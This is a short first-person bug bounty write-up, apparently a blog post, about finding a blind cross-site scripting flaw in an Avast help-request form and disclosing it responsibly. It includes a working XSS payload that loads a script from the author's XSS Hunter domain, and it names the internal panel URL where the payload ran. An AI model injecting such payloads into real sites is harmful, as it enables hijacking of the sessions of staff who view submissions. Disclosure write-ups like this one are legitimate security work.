My firts Writeup Blind xss

Hay evrybody i hope you all good,its my firts time i write my story on bugbounty,it started when i come to avast.com i search some vulnerability there but not luck i cant found anything there and after several hours of serching i found some place where we can make some help request to the panel service.

the page look like this

its my favorite place where i can try to found some blind xss. then i open my xss hunter and insert some xss hunter payload ‘“><script src=https://dimasaprilian993.xss.ht></script’ > on the your firts name.

after that i just submited my request and hope my payload execute on the panel service . okey here i just waything and after one day i got notification from xss hunter to my email if my payload was execute on http://ccs.int.avast.com:8181/sf_case.php?

oh ya this my lucky , after its i just reported my finding to the security i send them email with description of my finding.

TIME LINE

27 maret i send email to secuirty

6 april they work fixing the bug

29 april bug fixing,they give me certivicate and i request to disclosure.

thanks.